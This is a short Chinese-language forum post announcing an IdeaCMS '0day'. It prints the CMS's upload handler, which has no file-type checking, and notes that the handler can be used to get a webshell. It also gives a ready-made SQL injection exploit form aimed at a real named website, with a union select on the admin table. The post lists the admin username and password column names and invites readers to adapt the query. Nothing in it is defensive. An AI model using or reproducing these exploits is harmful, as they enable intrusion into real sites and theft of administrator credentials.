IdeaCMS 0day

鸡肋的上传漏洞 不过对后台拿shell做了点贡献~

upinc.asp：

<!--#include file="chkuser.asp"-->

<%Server.ScriptTimeOut=5000%>

<style type="text/css">

*{ padding:0px; margin:0px; font-size:12px}

a{ color:#666666;}

a:hover{ color:#000000}

</style>

<!--#include FILE="upload_5xsoft.inc"-->

<%

f="Uploadpic/" '图片存放文件夹路径

n=request.QueryString("n")

x=request.QueryString("x")

m=request("m")

if m="ok" then

set upload=new upload_5xsoft

set file=upload.file("file1")

formPath=f

if file.fileSize>0 then

file.saveAs Server.mappath(formPath&file.FileName)

%>

<script>

<%if x=1 then%>

parent.document.all.<%=n%>.value=parent.document.all.<%=n%>.value+"<%=f%><%=File.FileName%>";

<%else%>

parent.document.all.<%=n%>.value="admin/<%=f%><%=File.FileName%>";

<%end if%>

</script>

<input value="admin/<%=f%><%=File.FileName%>" name="text" type="hidden">

<a href="#" onclick="window.clipboardData.setData('text',text.value);">[复制地址]</a> <a href="upinc.asp?n=<%=n%>&x=<%=x%>">[重新上传]</a>

<%

end if

set file=nothing

set upload=nothing

else

%>

<form name="form1" method="post" action="upinc.asp?m=ok&n=<%=n%>&x=<%=x%>" enctype="multipart/form-data" style="margin:0px; margin:0px;" >

<input type="file" name="file1" style="width:200" class="tx1" value=""><input name="" type="submit" value="上传" />

</form>

<%end if%>

包含的那个文件只是用session验证下是否为空。 。 很鸡肋的~

这个上传 能上传任何文件。

下面是一个注射漏洞的exp 直接放exp了 不分析了 有兴趣的去down份下来分析下：

<H1>IdeaCMS 's EXP --code by Link</H1><br><br>

<form action="http://www.taikoosoft.com/NewsShow.asp?id=30+union select 1,2,3,4,5,6,7,8,9,10

from admin where" method=post name=myform enctype="multipart/form-data">

<input type=submit value=Fuck>

</form>

/*表里面有三个字段,

admin_user

admin_pwd

ID

自己改变下语句日把

很简单。 不分析了